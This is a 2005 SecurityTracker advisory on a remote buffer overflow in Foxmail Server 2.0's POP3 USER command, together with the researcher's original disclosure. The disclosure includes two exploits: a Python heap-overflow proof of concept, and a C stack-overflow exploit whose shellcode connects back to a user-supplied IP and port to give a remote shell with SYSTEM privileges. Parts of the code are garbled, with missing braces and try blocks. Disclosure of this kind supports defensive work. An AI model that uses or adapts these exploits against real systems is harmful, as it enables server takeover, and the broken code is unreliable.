Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (E-mail Server)  >   Foxmail Vendors:
Foxmail Server Buffer Overflow in USER Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1013356
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 2 2005
Impact:   Denial of service via network, Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   Some vulnerabilities were reported in Foxmail Server. A remote user can execute arbitrary code on the target system.

The POP server does not properly validate user-supplied input in the 'USER' command. A remote user can supply a specially crafted USER command to trigger a buffer overflow and execute arbitrary code with System privileges.

A remote user can also send a USER command containing format string characters to cause the target service to crash.

xouyang from Fortinet, inc reported this vulnerability.

Impact:   A remote user can cause the target service to crash.

A remote user can execute arbitrary code on the target system with System privileges.

Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error, Input validation error, State error
Underlying OS:  Linux (Any), Windows (Any)
Underlying OS Comments:  Tested only on Windows

Message History:   None.

 Source Message Contents

Subject:  Foxmail server "USER" command Multiple remote buffer overflow

(Fortinet, inc)
xouyang<> <>

    Foxmail Server. A Mail server for both Windows and linux.

    Foxmail server for windows version 2.0 (latest). I've just tested windows server, the linux version may be vulnerable too.

    Foxmail-the Email client application is the most famous software product in China. Chinese version is sold to more than 3 million
 users and English version to over 20 countries. It is listed as "Top Ten Domestic Software" and evaluated as "5 Star Software" by
    BODA s NT/Linux-based email server system is featured by stability, security, ease of installation and maintenance, rich functions.
 Different versions of product can meet the varied needs ranging from small/medium- sized enterprises to ISPs/ICPs/ASPs.


    A vulnerabilities have been identified in Foxmail server, which can be exploited by malicious people to cause a DoS (Denial of
 Service) or maybe compromise a vulnerable server.

    The vulnerabilities are caused due to boundary errors in the handling of the "USER " commands in POP server. A malicious person
 can exploit this by supplying a long, specially crafted argument to the vulnerable commands, which will result in a buffer overflow.

    1.Heap overflow
    Send a long username and recv the packet will cause a heap overflow.
    00401BEA  |.  8902                mov     dword ptr ds:[edx], eax
    00401BEC  |.  8950 04             mov     dword ptr ds:[eax+4], edx

    EAX = 41414141
    EBX = 41414141 

    Successful exploitation will allow remote execution of arbitrary code with SYSTEM privileges.
    2.format string
    Sending a username like "%n%n" cause a DOS attach.

    3.stack overflow.
    Successful exploitation will allow remote execution of arbitrary code with SYSTEM privileges. Swan provides an exploit to test
 this bug.

FOXmail POC exploit:
1.heap overflow
#Code by OYXin
import socket
import sys
import getopt

def usage():
    print "Usage: -h host -p port"
if __name__ == '__main__':
        opts, args = getopt.getopt(sys.argv[1:], "h:p:") 
    except getopt.GetoptError, msg: 
        print msg
    for o,a in opts:
        if o in ["-h"]:
            host = a
        if o in ["-p"]:
            port = int(a)

    evilbuf =  "USER " + "A"*5000 + "\r\n"
    evilbuf2 = "PASS oyxin\r\n"
    evilbuf2 += "STAT\r\n"
    evilbuf2 += "RSET\r\n"
    evilbuf2 += "QUIT\r\n"
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((host, port))
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
    except socket.error, msg:
        print msg

2.stack overflow
#Code by Swan(
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>

#pragma comment (lib,"ws2_32")

#define PORT_OFFSET  118
#define IP_OFFSET    111

char Shellcode[] =	"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"

char szUser[]	=	"user 1231231231231234567890abcdefghijklmnopqrstuvwxyz1234567890a"
unsigned char szPass[] = "pass siglos\r\n";

void help(char *program)
	printf ("========================================================\r\n");
	printf ("Aerofox Mail Server POP3 Temp Dir Stack Overflow\r\n");
	printf ("========================================================\r\n\r\n");
	printf ("Usage: %s <Host> <Your IP> <Your port>\r\n", program);
	printf ("e.g.:\r\n");
	printf ("     %s 8111\r\n", program);
	printf ("\r\n  The ret address is 0x7ffa1571.\r\n");

SOCKET Connect(char *u_host ,unsigned short u_port)
	WSADATA wsaData;
	SOCKET sock;
	struct hostent *r;
	struct sockaddr_in r_addr;
	int timeout = 1000;

	if(WSAStartup(0x0101,&wsaData) != 0)
		printf("error starting winsock..");
		return -1;
	if((r=gethostbyname(u_host))== NULL)
		return -1 ;
		return -1 ;
	r_addr.sin_addr=*((struct in_addr*)r->h_addr);

	if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
		printf("Can't connect\n");
	setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));

void Disconnect(SOCKET s)

void tr(SOCKET s)
	char buff[1500];
	memset(buff, 0, sizeof(buff));
	recv(s, buff, sizeof(buff), 0);

void SlowSend(SOCKET s, char *buf, int p)
	//send(s, buf, sizeof(buf),0);
	//send(s, "\r\n", 2,0);
	for(unsigned int i = 0; i < strlen(buf); i++)
		printf("%c", buf[i]);
		send(s, (char*)&(buf[i]), 1, 0);

void main(int argc, char *argv[])
		mov		eax,90909091h
		dec		eax
	a:	dec		ebx
		cmp		[ebx], eax
		jnz		a
		push	ebx
	if(argc != 4)

	unsigned short    port;
    unsigned long     ip;

    port = htons(atoi(argv[3]))^(USHORT)0x9999;
    ip = inet_addr(argv[2])^(ULONG)0x99999999;
    memcpy(&Shellcode[PORT_OFFSET], &port, 2);
    memcpy(&Shellcode[IP_OFFSET], &ip, 4);

	SOCKET s = Connect(argv[1], 110);
	memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
	memcpy(szUser + 244 + 8,  "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\xC3\x90\x90\x90\x90", 17);
	memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);

	SlowSend(s, (char*)szUser, 1);
	SlowSend(s, (char*)szPass, 100);

    Thanks swan for providing his cool exploit.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC